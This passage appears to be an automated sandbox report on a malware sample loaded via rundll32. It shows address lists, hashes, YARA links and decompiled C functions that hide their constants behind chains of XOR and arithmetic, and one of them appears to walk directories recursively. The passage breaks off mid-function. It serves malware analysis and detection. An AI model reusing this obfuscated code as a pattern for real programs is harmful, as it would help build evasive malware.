0x007b0f71
0x007b0f80
0x007b0f83
0x007b0f87
0x007b0f8c
0x007b0f91
0x007b0f99
0x007b0fa4
0x007b0faf
0x007b0fba
0x007b0fc2
0x007b0fc7
0x007b0fcf
0x007b0fd7
0x007b0fdf
0x007b0fe9
0x007b0fed
0x007b0ff5
0x007b1000
0x007b1008
0x007b1013
0x007b1020
0x007b1024
0x007b102c
0x007b1034
0x007b103c
0x007b104c
0x007b1050
0x007b1058
0x007b1060
0x007b1072
0x007b1075
0x007b107c
0x007b1089
0x007b1094
0x007b109f
0x007b10aa
0x007b10bf
0x007b10c2
0x007b10c9
0x007b10d4
0x007b10df
0x007b10e6
0x007b10f1
0x007b10f9
0x007b1105
0x007b1109
0x007b110e
0x007b1116
0x007b1121
0x007b112c
0x007b1137
0x007b113f
0x007b1144
0x007b114c
0x007b1154
0x007b115f
0x007b116a
0x007b1175
0x007b117d
0x007b1185
0x007b118a
0x007b1192
0x007b119a
0x007b11a2
0x007b11aa
0x007b11b7
0x007b11ba
0x007b11be
0x007b11c6
0x007b11ce
0x007b11d3
0x007b11db
0x007b11e3
0x007b11eb
0x007b11f0
0x007b11f5
0x007b11fd
0x007b1205
0x007b1215
0x007b1219
0x007b1222
0x007b1227
0x007b122d
0x007b1235
0x007b1247
0x007b124a
0x007b1251
0x007b125c
0x007b1267
0x007b126f
0x007b127a
0x007b1282
0x007b128a
0x007b1292
0x007b129a
0x007b12a7
0x007b12b9
0x007b12bd
0x007b12c2
0x007b12c7
0x007b12cf
0x007b12d7
0x007b12e1
0x007b12e5
0x007b12ed
0x007b12f5
0x007b12f9
0x007b1301
0x007b1309
0x007b1311
0x007b1319
0x007b1321
0x007b1325
0x007b132d
0x007b133a
0x007b133e
0x007b1343
0x007b134b
0x007b1353
0x007b135b
0x007b1365
0x007b1369
0x007b1371
0x007b137c
0x007b1387
0x007b1392
0x007b139f
0x007b13a3
0x007b13ab
0x007b13b3
0x007b13bb
0x007b13c0
0x007b13c5
0x007b13c9
0x007b13d1
0x007b13d9
0x007b13e4
0x007b13ef
0x007b13fa
0x007b1402
0x007b140a
0x007b1412
0x007b141a
0x007b1422
0x007b142a
0x007b1432
0x007b143a
0x007b1442
0x007b144a
0x007b1458
0x007b1572
0x00000000
0x007b145e
0x007b145e
0x007b1460
0x007b163b
0x007b163b
0x007b1641
0x00000000
0x00000000
0x007b1466
0x007b1485
0x007b14bc
0x007b14c3
0x007b14c8
0x007b14d1
0x007b1524
0x007b1536
0x007b1554
0x007b155b
0x007b1560
0x007b1565
0x007b156b
0x00000000
0x007b156b
0x007b1565
0x007b1460
0x007b1651
0x007b1651
0x007b1579
0x007b1587
0x007b158b
0x007b159a
0x007b159b
0x007b15a0
0x007b15a9
0x007b15f0
0x007b15fc
0x007b1605
0x007b160d
0x007b160f
0x007b1613
0x007b1614
0x007b1615
0x007b1616
0x007b1617
0x007b1629
0x007b162d
0x007b162e
0x007b1633
0x007b1636
0x00000000

Strings

Fo, xrefs: 007B0E80
M_o9, xrefs: 007B1412
[K, xrefs: 007B10D4

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Fo$M_o9$[K
API String ID: 0-3743190696
Opcode ID: e302fedc3847bcea4a695a8d1ba5c66bccf9e73e3bd4b9d2ebefa0e69b532a4e
Instruction ID: 35d8e813de6fdfa23128ee14f84fcb572bf2ba4ff0534a3820c8f7a64ef2078f
Opcode Fuzzy Hash: e302fedc3847bcea4a695a8d1ba5c66bccf9e73e3bd4b9d2ebefa0e69b532a4e
Instruction Fuzzy Hash: A41210B1409381CFD368CF21C58AA9BBBF1FBC5748F508A1DE59A96260D7B58909CF13

Uniqueness

Uniqueness Score: -1.00%

Function 007A9DCF Relevance: 4.1, Strings: 3, Instructions: 315
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E007A9DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v136;
				char _v160;
				short _v708;
				short _v710;
				char _v712;
				signed int _v756;
				char _v1276;
				char _v1796;
				void* _t278;
				signed int _t306;
				signed int _t310;
				void* _t312;
				intOrPtr _t317;
				void* _t319;
				signed int _t324;
				void* _t327;
				void* _t353;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				void* _t373;
				void* _t374;

				_t317 = _a12;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_t317);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t278);
				_v44 = 0x411c30;
				_t374 = _t373 + 0x20;
				_v44 = _v44 ^ 0x3aebcc2b;
				_v44 = _v44 ^ 0x10090153;
				_t319 = 0x338c922;
				_v44 = _v44 ^ 0x2aa3d158;
				_v56 = 0xa7c140;
				_v56 = _v56 >> 1;
				_v56 = _v56 ^ 0xbf613798;
				_v56 = _v56 ^ 0xbf3c535c;
				_v88 = 0xb7ebf9;
				_t365 = 0x52;
				_v88 = _v88 / _t365;
				_v88 = _v88 ^ 0x0004e01e;
				_v112 = 0x1a3e5b;
				_v112 = _v112 + 0xd588;
				_v112 = _v112 ^ 0x0012c9bc;
				_v8 = 0x55b84a;
				_t366 = 0x72;
				_v8 = _v8 * 0x74;
				_v8 = _v8 + 0xffff07de;
				_v8 = _v8 * 0x41;
				_v8 = _v8 ^ 0xdc74eedb;
				_v96 = 0x123c4e;
				_v96 = _v96 + 0x1d06;
				_v96 = _v96 ^ 0x001f978b;
				_v124 = 0x58f8d3;
				_v124 = _v124 * 0x2b;
				_v124 = _v124 ^ 0x0efbe47e;
				_v120 = 0x58d481;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x0b1fdd63;
				_v32 = 0x85548e;
				_v32 = _v32 / _t366;
				_v32 = _v32 * 0x2e;
				_v32 = _v32 ^ 0x0037cfdf;
				_v108 = 0x851b7a;
				_v108 = _v108 | 0xf3ff5f40;
				_v108 = _v108 ^ 0xf3fc1521;
				_v76 = 0x86d28f;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000a85f2;
				_v48 = 0x8a8988;
				_v48 = _v48 + 0xffff9d54;
				_v48 = _v48 + 0xffffb441;
				_v48 = _v48 ^ 0x008c2bbe;
				_v80 = 0x3fe2a4;
				_v80 = _v80 ^ 0x5e00b743;
				_v80 = _v80 ^ 0x5e39b1b0;
				_v116 = 0x4ea08b;
				_v116 = _v116 + 0xffffca32;
				_v116 = _v116 ^ 0x00427ef9;
				_v104 = 0xba6181;
				_v104 = _v104 + 0xf529;
				_v104 = _v104 ^ 0x00b33727;
				_v52 = 0x1e8210;
				_v52 = _v52 >> 8;
				_v52 = _v52 | 0xffb97487;
				_v52 = _v52 ^ 0xffb16a42;
				_v40 = 0xeabfd3;
				_v40 = _v40 ^ 0x26644279;
				_t367 = 0x3a;
				_v40 = _v40 / _t367;
				_v40 = _v40 ^ 0x00a36ea5;
				_v12 = 0xc9f67b;
				_v12 = _v12 + 0x836b;
				_v12 = _v12 | 0xa1408986;
				_t368 = 0x45;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0xf1cc1c9a;
				_v36 = 0x1f6921;
				_v36 = _v36 ^ 0x9bf749ed;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x024ed910;
				_v64 = 0x37ccf2;
				_v64 = _v64 + 0xfffff775;
				_t369 = 0x19;
				_v64 = _v64 * 0x24;
				_v64 = _v64 ^ 0x07d7b77b;
				_v28 = 0x370f8;
				_v28 = _v28 << 0xd;
				_v28 = _v28 + 0x6470;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x37097055;
				_v20 = 0x84152c;
				_v20 = _v20 * 0x7e;
				_v20 = _v20 / _t369;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x6c90d6a3;
				_v60 = 0x687dd9;
				_t370 = 0xc;
				_v60 = _v60 * 0x1d;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0xeb212648;
				_v84 = 0xd09924;
				_v84 = _v84 * 0x7c;
				_v84 = _v84 ^ 0x650614c5;
				_v100 = 0x3804f2;
				_v100 = _v100 | 0x9eb8052c;
				_v100 = _v100 ^ 0x9eb506d7;
				_v92 = 0xf492b0;
				_v92 = _v92 + 0xffffc4ae;
				_v92 = _v92 ^ 0x00fafa5e;
				_v16 = 0xd0e41e;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000dc1c9;
				_v24 = 0x66d2fe;
				_v24 = _v24 / _t370;
				_v24 = _v24 + 0xffffccd2;
				_v24 = _v24 ^ 0x0a93dd72;
				_v24 = _v24 ^ 0x0a9c564f;
				_v72 = 0xbcf4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x000c8ddf;
				_t364 = _v72;
				_v68 = 0x4616df;
				_v68 = _v68 + 0x9c8e;
				_v68 = _v68 + 0xaaef;
				_v68 = _v68 ^ 0x004c065d;
				while(1) {
					L1:
					_t353 = 0x2e;
					L2:
					while(_t319 != 0x21229d9) {
						if(_t319 == 0x338c922) {
							_v136 = _t317;
							_t319 = 0x9035918;
							continue;
						}
						if(_t319 == 0x5b964d8) {
							__eflags = _v756 & _v44;
							if(__eflags == 0) {
								_t306 = _a16( &_v756,  &_v160);
								asm("sbb ecx, ecx");
								_t324 =  ~_t306 & 0x09c7cc54;
								L9:
								_t319 = _t324 + 0x21229d9;
								while(1) {
									L1:
									_t353 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v712 - _t353;
							if(_v712 != _t353) {
								L19:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v116);
									_t312 = E007BDCF7(_v80, 0x7a17a0, __eflags);
									_pop(_t327);
									E007A47CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
									E007A9DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
									_t310 = E007AA8B0(_v100, _t312, _v92);
									_t374 = _t374 + 0x3c;
									_t353 = 0x2e;
								}
								L18:
								_t319 = 0xbd9f62d;
								continue;
							}
							__eflags = _v710;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v710 - _t353;
							if(_v710 != _t353) {
								goto L19;
							}
							__eflags = _v708;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t319 == 0x9035918) {
							_push(_v112);
							_push(_v88);
							E007AA918(_t317, __eflags, _v8, _v96, E007BDCF7(_v56, 0x7a1770, __eflags), _v124,  &_v1796);
							_t374 = _t374 + 0x1c;
							_t310 = E007AA8B0(_v120, _t307, _v32);
							_t319 = 0xb066d4a;
							while(1) {
								L1:
								_t353 = 0x2e;
								goto L2;
							}
						}
						if(_t319 == 0xb066d4a) {
							_t310 = E007A7E00(_v108,  &_v756, _v76, _v48,  &_v1796);
							_t364 = _t310;
							_t374 = _t374 + 0xc;
							__eflags = _t310 - 0xffffffff;
							if(__eflags == 0) {
								L25:
								return _t310;
							}
							_t319 = 0x5b964d8;
							goto L1;
						}
						if(_t319 != 0xbd9f62d) {
							L24:
							__eflags = _t319 - 0xa89df2;
							if(__eflags != 0) {
								continue;
							}
							goto L25;
						}
						_t310 = E007A4635(_v16,  &_v756, _t364, _v24);
						asm("sbb ecx, ecx");
						_t324 =  ~_t310 & 0x03a73aff;
						goto L9;
					}
					E007A8ABF(_t364, _v72, _v68);
					_t319 = 0xa89df2;
					_t353 = 0x2e;
					goto L24;
				}
			}

0x007a9dd9
0x007a9dde
0x007a9de1
0x007a9de4
0x007a9de7
0x007a9de8
0x007a9deb
0x007a9dee
0x007a9def
0x007a9df0
0x007a9df5
0x007a9dfc
0x007a9dff
0x007a9e08
0x007a9e0f
0x007a9e14
0x007a9e1b
0x007a9e22
0x007a9e25
0x007a9e2c
0x007a9e33
0x007a9e3f
0x007a9e44
0x007a9e49
0x007a9e50
0x007a9e57
0x007a9e5e
0x007a9e65
0x007a9e70
0x007a9e71
0x007a9e74
0x007a9e7f
0x007a9e82
0x007a9e89
0x007a9e90
0x007a9e97
0x007a9e9e
0x007a9ea9
0x007a9eac
0x007a9eb3
0x007a9eba
0x007a9ebe
0x007a9ec5
0x007a9ed1
0x007a9ed8
0x007a9edb
0x007a9ee2
0x007a9ee9
0x007a9ef0
0x007a9ef7
0x007a9efe
0x007a9f02
0x007a9f09
0x007a9f10
0x007a9f17
0x007a9f1e
0x007a9f25
0x007a9f2c
0x007a9f33
0x007a9f3a
0x007a9f41
0x007a9f48
0x007a9f4f
0x007a9f56
0x007a9f5d
0x007a9f64
0x007a9f6b
0x007a9f71
0x007a9f78
0x007a9f7f
0x007a9f86
0x007a9f92
0x007a9f97
0x007a9f9c
0x007a9fa3
0x007a9faa
0x007a9fb1
0x007a9fbc
0x007a9fbf
0x007a9fc2
0x007a9fc9
0x007a9fd0
0x007a9fde
0x007a9fe1
0x007a9fe8
0x007a9fef
0x007a9ffa
0x007a9ffd
0x007aa000
0x007aa007
0x007aa00e
0x007aa012
0x007aa019
0x007aa01c
0x007aa023
0x007aa02e
0x007aa038
0x007aa03b
0x007aa03f
0x007aa046
0x007aa051
0x007aa052
0x007aa055
0x007aa059
0x007aa060
0x007aa06b
0x007aa06e
0x007aa075
0x007aa07c
0x007aa083
0x007aa08a
0x007aa091
0x007aa098
0x007aa09f
0x007aa0aa
0x007aa0ad
0x007aa0b1
0x007aa0b5
0x007aa0bc
0x007aa0c8
0x007aa0cb
0x007aa0d2
0x007aa0d9
0x007aa0e0
0x007aa0e7
0x007aa0eb
0x007aa0f2
0x007aa0f5
0x007aa0fc
0x007aa103
0x007aa10a
0x007aa111
0x007aa111
0x007aa113
0x00000000
0x007aa114
0x007aa126
0x007aa2d3
0x007aa2d9
0x00000000
0x007aa2d9
0x007aa132
0x007aa1fa
0x007aa200
0x007aa2bf
0x007aa2c6
0x007aa2c8
0x007aa174
0x007aa174
0x007aa111
0x007aa111
0x007aa113
0x00000000
0x007aa113
0x007aa111
0x007aa206
0x007aa20d
0x007aa236
0x007aa236
0x007aa23a
0x007aa23c
0x007aa244
0x007aa24a
0x007aa250
0x007aa273
0x007aa294
0x007aa2a1
0x007aa2a6
0x007aa2ab
0x007aa2ab
0x007aa22c
0x007aa22c
0x00000000
0x007aa22c
0x007aa20f
0x007aa217
0x00000000
0x00000000
0x007aa219
0x007aa220
0x00000000
0x00000000
0x007aa222
0x007aa22a
0x00000000
0x00000000
0x00000000
0x007aa22a
0x007aa13e
0x007aa1af
0x007aa1b7
0x007aa1d7
0x007aa1dc
0x007aa1e7
0x007aa1ed
0x007aa111
0x007aa111
0x007aa113
0x00000000
0x007aa113
0x007aa111
0x007aa146
0x007aa192
0x007aa197
0x007aa199
0x007aa19c
0x007aa19f
0x007aa30b
0x007aa30b
0x007aa30b
0x007aa1a5
0x00000000
0x007aa1a5
0x007aa14e
0x007aa2f9
0x007aa2f9
0x007aa2ff
0x00000000
0x00000000
0x00000000
0x007aa2ff
0x007aa161
0x007aa16c
0x007aa16e
0x00000000
0x007aa16e
0x007aa2eb
0x007aa2f3
0x007aa2f8
0x00000000
0x007aa2f8

Strings

Up7, xrefs: 007AA01C
yBd&, xrefs: 007A9F86
H&!, xrefs: 007AA059

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: H&!$Up7$yBd&
API String ID: 0-2352930472
Opcode ID: c771f0bc3734d520be932c485436fde2546f6b7133829ddfec5cca717a72ab92
Instruction ID: 7072ac74f0e24d40293189d96d83fed1ea430016c33264a1e80e8d3f7d79149f
Opcode Fuzzy Hash: c771f0bc3734d520be932c485436fde2546f6b7133829ddfec5cca717a72ab92
Instruction Fuzzy Hash: 54E16771D0021DEBCF28DFE4D98A9EEBBB1FB84314F208259E515BA260D7B80A55CF51

Uniqueness

Uniqueness Score: -1.00%

Function 007B95FA Relevance: 4.0, Strings: 3, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007B95FA() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				intOrPtr _t295;
				void* _t297;
				void* _t298;
				intOrPtr _t299;
				signed int _t306;
				void* _t309;
				void* _t310;
				char _t311;
				void* _t317;
				intOrPtr _t334;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				void* _t347;

				_v668 = 0xe6fb93;
				_v668 = _v668 + 0xffff1eed;
				_t310 = 0xada6804;
				_v668 = _v668 * 0x61;
				_t309 = 0;
				_v668 = _v668 ^ 0xaca28cc6;
				_v668 = _v668 ^ 0xfb928647;
				_v616 = 0x8caf33;
				_t341 = 0x42;
				_v616 = _v616 * 0x25;
				_v616 = _v616 * 0x4f;
				_v616 = _v616 ^ 0x46546a51;
				_v620 = 0x861136;
				_v620 = _v620 | 0x52f06d4d;
				_v620 = _v620 >> 0xf;
				_v620 = _v620 ^ 0x0000a5ef;
				_v628 = 0x4cf396;
				_v628 = _v628 >> 1;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x0000133c;
				_v684 = 0xc54e58;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0xb8bf25ee;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0x2e259ad3;
				_v592 = 0x68267f;
				_v592 = _v592 + 0xffff39c4;
				_v592 = _v592 ^ 0x006c60f9;
				_v632 = 0xa1d089;
				_v632 = _v632 / _t341;
				_v632 = _v632 ^ 0x52222b14;
				_v632 = _v632 ^ 0x5220bcfc;
				_v608 = 0x39d352;
				_v608 = _v608 | 0x2e7e1ae1;
				_v608 = _v608 ^ 0x576cc274;
				_v608 = _v608 ^ 0x7911cf35;
				_v660 = 0xc26f36;
				_v660 = _v660 ^ 0x9f5dc88a;
				_v660 = _v660 ^ 0xeefda613;
				_t342 = 0x3f;
				_v660 = _v660 / _t342;
				_v660 = _v660 ^ 0x01ce77bb;
				_v624 = 0x334861;
				_v624 = _v624 + 0xffff4b1a;
				_t343 = 0x2a;
				_v624 = _v624 * 0x2f;
				_v624 = _v624 ^ 0x0947e580;
				_v652 = 0xab72b9;
				_v652 = _v652 << 8;
				_v652 = _v652 / _t343;
				_v652 = _v652 ^ 0x0419701b;
				_v688 = 0x507748;
				_v688 = _v688 << 5;
				_v688 = _v688 + 0xffff449a;
				_v688 = _v688 + 0xb858;
				_v688 = _v688 ^ 0x0a0a66f0;
				_v600 = 0x95cabc;
				_v600 = _v600 + 0xffffb185;
				_v600 = _v600 << 9;
				_v600 = _v600 ^ 0x2af43595;
				_v580 = 0x7e3ec7;
				_v580 = _v580 ^ 0x09caac24;
				_v580 = _v580 ^ 0x09b70662;
				_v612 = 0xa526a8;
				_v612 = _v612 | 0x64dab874;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 ^ 0x0006f9eb;
				_v604 = 0xb7de18;
				_t344 = 0x48;
				_v604 = _v604 * 0x79;
				_v604 = _v604 * 0x31;
				_v604 = _v604 ^ 0xa26ee4e9;
				_v640 = 0x553c00;
				_v640 = _v640 + 0xffff4196;
				_v640 = _v640 + 0xffff8daf;
				_v640 = _v640 ^ 0x00577a07;
				_v576 = 0xaac37;
				_v576 = _v576 * 0x77;
				_v576 = _v576 ^ 0x04fc3a71;
				_v676 = 0xb6ce7b;
				_v676 = _v676 >> 1;
				_v676 = _v676 * 0x28;
				_v676 = _v676 >> 0xb;
				_v676 = _v676 ^ 0x000b20b4;
				_v584 = 0x4877b4;
				_v584 = _v584 << 1;
				_v584 = _v584 ^ 0x009148e9;
				_v588 = 0xaf1c90;
				_v588 = _v588 * 0x5b;
				_v588 = _v588 ^ 0x3e3937c6;
				_v644 = 0x150bb3;
				_v644 = _v644 + 0x865c;
				_v644 = _v644 + 0x5404;
				_v644 = _v644 ^ 0x001dce65;
				_v648 = 0xaa3958;
				_v648 = _v648 / _t344;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x000a9525;
				_v596 = 0xdb2add;
				_v596 = _v596 << 0xd;
				_v596 = _v596 ^ 0x65528fd4;
				_v680 = 0xd04d0c;
				_v680 = _v680 << 5;
				_t340 = _v596;
				_v680 = _v680 * 0x55;
				_v680 = _v680 | 0x96843ebb;
				_v680 = _v680 ^ 0xb7be4a39;
				_v656 = 0x2591b4;
				_v656 = _v656 ^ 0x7517a4f1;
				_v656 = _v656 ^ 0xb20365ef;
				_v656 = _v656 + 0xffff4c4f;
				_v656 = _v656 ^ 0xc733773b;
				_v636 = 0xbfc674;
				_v636 = _v636 * 0x1d;
				_v636 = _v636 << 6;
				_v636 = _v636 ^ 0x6e5b8cbc;
				_v664 = 0x3235cc;
				_v664 = _v664 << 1;
				_v664 = _v664 | 0x857b9d7f;
				_v664 = _v664 * 0x28;
				_v664 = _v664 ^ 0xdbf98c50;
				_v672 = 0xb181ad;
				_v672 = _v672 >> 0xa;
				_v672 = _v672 << 2;
				_v672 = _v672 ^ 0xdb7e6d02;
				_v672 = _v672 ^ 0xdb78e9e9;
				do {
					while(_t310 != 0x10c1a7f) {
						if(_t310 == 0x31db0c0) {
							_t311 = _v572;
							_t295 = _v568;
							_push(_t311);
							_v560 = _t295;
							_v552 = _t295;
							_v544 = _t295;
							_v536 = _t295;
							_v564 = _t311;
							_v556 = _t311;
							_v548 = _t311;
							_v540 = _t311;
							_v532 = _v628;
							_t297 = E007A5DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
							_t347 = _t347 + 0x18;
							__eflags = _t297;
							_t309 =  !=  ? 1 : _t309;
							_t310 = 0x48f7cbb;
							continue;
						} else {
							if(_t310 == 0x461819e) {
								_push(_v660);
								_push(_v608);
								_t298 = E007BDCF7(_v632, 0x7a1000, __eflags);
								_pop(_t317);
								_t299 =  *0x7c3e10; // 0x0
								_t334 =  *0x7c3e10; // 0x0
								E007A47CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
								E007AA8B0(_v612, _t298, _v604);
								_t347 = _t347 + 0x24;
								_t310 = 0xa22489e;
								continue;
							} else {
								if(_t310 == 0x48f7cbb) {
									E007B1E67(_v656, _v636, _v664, _v672, _t340);
								} else {
									if(_t310 == 0xa22489e) {
										_t306 = E007A8F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
										_t340 = _t306;
										_t347 = _t347 + 0x28;
										__eflags = _t306 - 0xffffffff;
										if(__eflags != 0) {
											_t310 = 0x31db0c0;
											continue;
										}
									} else {
										if(_t310 == 0xada6804) {
											_t310 = 0xcbcd90e;
											continue;
										} else {
											if(_t310 != 0xcbcd90e) {
												goto L15;
											} else {
												E007BC1EC(_v684, _v592,  &_v572);
												_t310 = 0x10c1a7f;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t309;
					}
					_v572 = _v572 - E007BABD1();
					_t310 = 0x461819e;
					asm("sbb [esp+0x8c], edx");
					L15:
					__eflags = _t310 - 0x7e6efe8;
				} while (__eflags != 0);
				goto L18;
			}

0x007b9600
0x007b960a
0x007b9612
0x007b9620
0x007b9624
0x007b9626
0x007b962e
0x007b9636
0x007b9645
0x007b9648
0x007b9651
0x007b9655
0x007b965d
0x007b9665
0x007b966d
0x007b9672
0x007b967a
0x007b9682
0x007b9686
0x007b968b
0x007b9693
0x007b969b
0x007b96a0
0x007b96a8
0x007b96ad
0x007b96b5
0x007b96bd
0x007b96c5
0x007b96cd
0x007b96dd
0x007b96e1
0x007b96e9
0x007b96f1
0x007b96f9
0x007b9701
0x007b9709
0x007b9711
0x007b9719
0x007b9721
0x007b972d
0x007b9732
0x007b9738
0x007b9740
0x007b9748
0x007b9755
0x007b9756
0x007b975a
0x007b9762
0x007b976a
0x007b9775
0x007b9779
0x007b9781
0x007b9789
0x007b978e
0x007b9796
0x007b979e
0x007b97a6
0x007b97ae
0x007b97b6
0x007b97bb
0x007b97c3
0x007b97ce
0x007b97db
0x007b97eb
0x007b97f3
0x007b97fb
0x007b9800
0x007b9808
0x007b9817
0x007b9818
0x007b9821
0x007b9825
0x007b982d
0x007b9835
0x007b983d
0x007b9845
0x007b984d
0x007b9860
0x007b9867
0x007b9872
0x007b987a
0x007b9883
0x007b9887
0x007b988c
0x007b9894
0x007b989c
0x007b98a0
0x007b98a8
0x007b98b5
0x007b98b9
0x007b98c1
0x007b98c9
0x007b98d1
0x007b98d9
0x007b98e1
0x007b98ef
0x007b98f3
0x007b98f8
0x007b9900
0x007b9908
0x007b990d
0x007b9915
0x007b991d
0x007b9927
0x007b992b
0x007b992f
0x007b9937
0x007b993f
0x007b9947
0x007b994f
0x007b9957
0x007b995f
0x007b9967
0x007b9974
0x007b9978
0x007b997d
0x007b9985
0x007b998d
0x007b9991
0x007b999e
0x007b99a2
0x007b99aa
0x007b99b2
0x007b99b7
0x007b99bc
0x007b99c4
0x007b99cc
0x007b99cc
0x007b99da
0x007b9afd
0x007b9b06
0x007b9b0d
0x007b9b0e
0x007b9b15
0x007b9b1c
0x007b9b23
0x007b9b32
0x007b9b3d
0x007b9b49
0x007b9b54
0x007b9b62
0x007b9b69
0x007b9b70
0x007b9b74
0x007b9b76
0x007b9b79
0x00000000
0x007b99e0
0x007b99e6
0x007b9a87
0x007b9a90
0x007b9a98
0x007b9a9e
0x007b9aac
0x007b9ac3
0x007b9ad6
0x007b9aeb
0x007b9af0
0x007b9af3
0x00000000
0x007b99ec
0x007b99f2
0x007b9bba
0x007b99f8
0x007b99fe
0x007b9a6d
0x007b9a72
0x007b9a74
0x007b9a77
0x007b9a7a
0x007b9a80
0x00000000
0x007b9a80
0x007b9a00
0x007b9a06
0x007b9a31
0x00000000
0x007b9a08
0x007b9a0e
0x00000000
0x007b9a14
0x007b9a24
0x007b9a2a
0x00000000
0x007b9a2a
0x007b9a0e
0x007b9a06
0x007b99fe
0x007b99f2
0x007b99e6
0x007b9bc5
0x007b9bce
0x007b9bce
0x007b9b88
0x007b9b8f
0x007b9b94
0x007b9b9b
0x007b9b9b
0x007b9b9b
0x00000000

Strings

HwP, xrefs: 007B9781
QjTF, xrefs: 007B9655
aH3, xrefs: 007B9740

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: HwP$QjTF$aH3
API String ID: 0-3950587752
Opcode ID: 1a7dd0b0b332e29837a6a6368462efd9c64e8301de30ed7bd9341055932a8880
Instruction ID: 6be7f9a359466a94cbc774deb97690658da9c8d42389c8a085af6a6907ee64ca
Opcode Fuzzy Hash: 1a7dd0b0b332e29837a6a6368462efd9c64e8301de30ed7bd9341055932a8880
Instruction Fuzzy Hash: 93E11E714093819FD368CF25C58A65BBBF1FBC4748F208A1DF2AA86260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007AB2C7 Relevance: 4.0, Strings: 3, Instructions: 235
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E007AB2C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v40;
				char _v48;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
